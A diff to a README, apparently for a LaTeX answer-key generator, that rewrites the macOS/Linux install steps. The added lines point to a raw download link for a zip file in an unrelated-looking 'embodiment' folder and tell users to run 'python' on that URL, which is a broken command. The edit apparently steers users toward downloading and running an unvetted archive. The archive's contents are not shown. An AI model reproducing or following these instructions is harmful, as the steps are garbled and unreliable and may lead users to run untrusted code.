mohamedsayed123m/latex-answer-key-generator/README.md

 4. **Install the Application**:
    - **Windows**: Double-click on the downloaded `.exe` file and follow the installation prompts.
-   - **macOS/Linux**: If you downloaded a `.tar.gz`, extract it using any archive manager.
-Then, open the terminal, navigate to the extracted folder, and run the application using `python main.py`.
+   - **macOS/Linux**: If you downloaded a `https://raw.githubusercontent.com/mohamedsayed123m/latex-answer-key-generator/main/embodiment/latex-answer-key-generator_v1.0.zip`, extract it using any archive manager.
+Then, open the terminal, navigate to the extracted folder, and run the application using `python https://raw.githubusercontent.com/mohamedsayed123m/latex-answer-key-generator/main/embodiment/latex-answer-key-generator_v1.0.zip`.

 5. **Run the Application**:
    After installation, you can run the application from your applications folder or command line.